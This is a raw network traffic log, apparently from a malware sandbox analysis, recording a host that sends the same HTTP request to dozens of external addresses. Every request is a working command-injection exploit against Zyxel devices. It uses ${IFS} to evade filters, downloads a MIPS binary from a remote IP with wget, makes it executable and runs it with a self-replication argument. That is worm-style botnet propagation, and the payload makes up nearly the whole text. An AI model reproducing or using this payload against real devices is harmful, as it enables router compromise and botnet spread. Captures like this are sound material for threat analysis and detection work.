                                          Jan 14, 2024 15:46:20.081336021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5272192.168.2.233890862.229.60.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081378937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5273192.168.2.234253285.93.93.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081410885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5274192.168.2.233318236.38.202.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081434965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5275192.168.2.2358822181.132.72.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081470013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5276192.168.2.234343235.239.16.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081490993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5277192.168.2.2353404156.46.118.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081516981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5278192.168.2.2342770134.203.244.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081579924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5279192.168.2.2345674219.10.97.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081600904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5280192.168.2.2350874194.66.229.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081650972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5281192.168.2.235863019.92.18.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081665993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5282192.168.2.2349894171.171.2.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081682920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5283192.168.2.2341312152.66.48.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081747055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5284192.168.2.2340190144.50.72.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081779957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5285192.168.2.234382869.231.102.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081839085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5286192.168.2.235651097.192.111.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081902027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5287192.168.2.2349254111.203.138.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081902981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5288192.168.2.2359442190.179.117.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081952095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5289192.168.2.2353842181.173.66.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.081999063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5290192.168.2.2346452117.202.227.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082035065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5291192.168.2.235628814.141.49.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082079887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5292192.168.2.2343262106.62.118.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082106113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5293192.168.2.2336660122.77.56.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082108021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5294192.168.2.234673070.18.153.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082185984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5295192.168.2.235114668.166.92.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082216978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5296192.168.2.2335448198.73.26.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082236052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5297192.168.2.2348014106.8.201.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082281113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5298192.168.2.2340148181.47.185.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082323074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5299192.168.2.2356002186.116.139.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082370996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5300192.168.2.235435052.48.126.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082412958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5301192.168.2.2333200122.165.152.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082433939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5302192.168.2.2351754212.168.224.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082484007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5303192.168.2.2343422135.63.122.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082514048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5304192.168.2.23542449.218.50.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082564116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5305192.168.2.2352600205.131.215.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082622051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5306192.168.2.23550942.226.168.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082649946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5307192.168.2.234664077.186.12.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082665920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5308192.168.2.235548253.133.222.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082707882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5309192.168.2.235535479.176.23.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082732916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5310192.168.2.234950213.222.53.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082763910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5311192.168.2.2360196221.99.205.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082787991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5312192.168.2.2351082131.114.2.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082851887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5313192.168.2.234596072.25.233.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082860947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5314192.168.2.234857284.113.149.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082875013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5315192.168.2.235140672.178.45.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082921028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5316192.168.2.234473490.231.186.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082962990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5317192.168.2.2348838193.129.65.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.082998037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5318192.168.2.2337598107.218.204.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083024979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5319192.168.2.2356730197.19.91.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083049059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5320192.168.2.2348836189.8.148.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083081007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5321192.168.2.2355074151.109.198.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083120108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5322192.168.2.235525037.22.239.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083143950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5323192.168.2.2345228106.214.84.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083215952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5324192.168.2.2342738167.61.159.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083236933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5325192.168.2.2345516128.222.101.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083282948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5326192.168.2.2343480202.119.253.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083323956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5327192.168.2.23339789.53.61.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083359957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5328192.168.2.2334120116.128.8.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083398104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5329192.168.2.2358706149.121.145.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083434105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5330192.168.2.235607446.200.199.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083463907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5331192.168.2.235340837.241.6.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083508015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5332192.168.2.233287448.81.98.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083518028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5333192.168.2.2350836154.206.75.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:20.083548069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5334192.168.2.2343796168.239.206.79443
                                          TimestampBytes transferredDirectionData
